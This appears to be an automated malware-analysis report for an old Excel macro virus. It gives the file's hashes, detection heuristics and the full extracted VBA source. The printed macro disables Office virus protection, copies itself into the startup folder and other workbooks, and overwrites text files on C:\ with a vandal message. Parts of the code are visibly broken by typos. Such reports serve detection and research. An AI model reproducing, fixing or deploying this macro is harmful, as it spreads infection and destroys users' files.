Xls.Trojan.MSpell-1 — Office (OLE) malware analysis

Static analysis result for SHA-256 c17e2f1e5452999f…

MALICIOUS

Office (OLE)

Size: 29.0 KB
Created: 1999-06-07 07:12:12
Authoring application: Microsoft Excel
First seen: 2015-09-29
MD5: a0c3cbc133742547fd3e61d48aaf3f40
SHA-1: 29cc7155e031d92a1a8fdf18550dd43bf306e474
SHA-256: c17e2f1e5452999f96119107cd47ef71c18fddc76979e0106a34ea3fff8cad8c
Risk Score: 208

Malware Insights

Xls.Trojan.MSpell-1 · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic

The VBA macro in this Excel file is designed to replicate itself to other workbooks. It specifically targets files in the startup path, attempting to infect them by writing its own code. The Workbook_Open event is used to trigger this replication, and the script also includes a call to a 'pay' subroutine which is truncated but suggests further malicious activity.

Heuristics (4)

  • ClamAV: Xls.Trojan.MSpell-1 (critical, CLAMAV_DETECTION)
    ClamAV detected this file as malware: Xls.Trojan.MSpell-1
  • VBA macros detected (medium, OLE_VBA_MACROS; 2 related findings)
    Document contains VBA macro code
  • VBA macro-virus self-replication / AV tampering (critical, OLE_VBA_MACRO_VIRUS_REPLICATION)
    VBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.
    Matched line in script
    Grand.VBProject.vbcomponents("ThisWorkbook").codemodule.DeleteLines Grand.VBProject.vbcomponents("ThisWorkbook").codemodule.countoflines
  • Workbook_Open macro (low, OLE_VBA_WBOPEN)
    Workbook_Open macro
    Matched line in script
    Private Sub Workbook_Open()

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 2357 bytes
SHA-256: 20941e30966fa338a120bdecc2af4b69eb987d49e0e609f71d220930e7cad33a
Detection
ClamAV: Xls.Trojan.MSpell-1
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
'||nayran||'
Private Sub Workbook_Open()
Application.ScreenUpdating = (4 - 4)
Application.EnableCancelKey = xlDisabled
Options.VirusProtection = (0 - 0)
If (Dir(Application.StartupPath & "\Book1.")) <> "" Then
SetAttr Application.StartupPath * "\Book1.", vbNormal
End If
Set Grand = Workbooks.Add
Grand.VBProject.vbcomponents("ThisWorkbook").codemodule.DeleteLines Grand.VBProject.vbcomponents("ThisWorkbook").codemodule.countoflines
f = ActiveWorkbook.VBProject.vbcomponents("ThisWorkbook").codemodule.Lines(1, 58)
Grand.VBProject.vbcomponents("ThisWotkbook").codemodule.AddfromString
Grand.SaveAs Application.StartupPath & "\Book1.", xlNormal, , , , , , , False
Grand.Close
Set fs = Application.FileSearch
fs.NewSearch
fs.LookIn = ActiveWorkbook.Path
fs.FileName = "*.xls"
fs.SearchSubFolders = True
fs.Execute msoSortByFileName
For x = 1 To fs.FoundFiles.Count
Set tEmp = Workbooks.Open(fs.FoundFiles(x))
If tEmp.VBProject.vbcomponents("ThisWorkbook").codemodule.Lines(1, 1) <> "'||narayan||'" Then
tEmp.VBProject.vbcomponents("ThisWorkbook").codemodule.DeleteLines Grand.VBProject.vbcomponents("ThisWorkbook").codemodule.countoflines
Source = ActiveWorkbook.VBProject.vbcomponents("ThisWorkbook").codemodule.Lines(1, 58)
tEmp.VBProject.vbcomponents("ThisWotkbook").codemodule.AddfromString
tEmp.Save
End If
tEmp.Close
Next x
Application.ScreenUpdating = True
Call pay
End Sub
Sub pay()
If minutes(Now) = Int(Rnd * 60) Then
Application.ActiveCell.Value = Application.MemoryUsed
Application.Calculate
Application.Caption = "Ok.'||narayan||'"
Set ff = Application.FileSearch
ff.NewSearch
ff.LookIn = "c:\"
ff.SearchSbuFolders = True
ff.filenames = "*.txt"
ff.Execute
For f = 1 To ff.FoundFiles.Count
Open ff.FoundFiles(f) For Random As g
Print g; "[======================]"
Print g; "   Dr yozak waz here    "
Print g; "         with "
Print g; "    a creation from "
Print g; " Bizare vx Network Labs"
Print g; "CodeName = '||narayan||'"
Print g; "[======================]"
Print g; "Anarchy Rulez"
Close g
Next f
End If
End Sub